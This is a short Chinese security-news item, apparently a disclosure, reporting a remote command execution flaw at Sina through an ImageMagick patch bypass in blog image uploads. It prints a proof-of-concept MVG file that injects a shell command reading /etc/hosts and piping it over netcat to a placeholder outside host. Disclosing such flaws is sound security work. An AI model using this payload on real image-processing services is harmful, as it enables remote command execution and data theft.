频道栏目
首页 > 资讯 > 企业安全 > 正文

新浪存在远程命令执行漏洞(ImageMagick补丁绕过)

16-07-16        来源:[db:作者]  
收藏   我要投稿

新浪存在远程命令执行漏洞(ImageMagick补丁绕过)

详情:

http://permalink.gmane.org/gmane.comp.security.oss.general/19669

poc.png

push graphic-context

viewbox 0 0 640 480

image Over 0,0 0,0 '|cat /etc/hosts|nc xx.xx.xx.xx 5555'

pop graphic-context

博客上传图片的地方上传一个图片

 

02.png

 

 

02.png

 

解决方案:

打补丁

相关TAG标签
上一篇:oracle到kafka的同步
下一篇:康康在线某功能后台沦陷至百万居民基本档案/体检档案信息泄露
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站